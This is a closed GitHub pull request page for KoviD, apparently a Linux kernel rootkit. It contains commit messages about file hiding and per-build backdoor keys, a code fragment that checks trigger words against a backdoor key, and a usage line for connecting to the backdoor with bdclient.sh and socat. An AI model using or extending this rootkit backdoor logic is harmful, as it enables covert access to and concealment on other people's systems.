Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Kvdev #129

Closed
wants to merge 17 commits into from
Closed

Kvdev #129

wants to merge 17 commits into from

Conversation

carloslack
Copy link
Owner

No description provided.

if (silly_word == FUCK || silly_word == CUNT || silly_word == ASS)
{
uint64_t address_value = 0;
unsigned long a = BDKEY;

Check notice

Code scanning / CodeQL

Unused local variable Note

Variable a is not used.
@carloslack carloslack force-pushed the kvdev branch 5 times, most recently from 5c00c64 to 47e85fb Compare October 31, 2024 14:06
@carloslack carloslack force-pushed the kvdev branch 2 times, most recently from e2e9664 to 0327f8b Compare November 8, 2024 23:09
JNE added 15 commits November 8, 2024 23:22
Now matching latest changes in UI
Also fixed Opt_hide_file file handling
This way we can use them separately.
Will come back here another time
compiling != working

Hiding files and other things are broken at this point on 6+, don't matter
for now since the goal ATM is to have it compiled, which it did.

Changes here may be somehow incorrect and will need attention soon.
rm, ls, stat, find, tree, ...
A new key is generated everytime KoviD is compiled.

At the end of compilation:

Backdoor KEY: <KEY>

Run bdclient.sh like, e.g.:

$ sudo ./bdclient.sh socat <IP> <PORT> <Backdoor KEY>
now that it is checked in compile time, just
a little twak
@carloslack
Copy link
Owner Author

will reopen when the time comes

@carloslack carloslack closed this Nov 15, 2024
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

Successfully merging this pull request may close these issues.

1 participant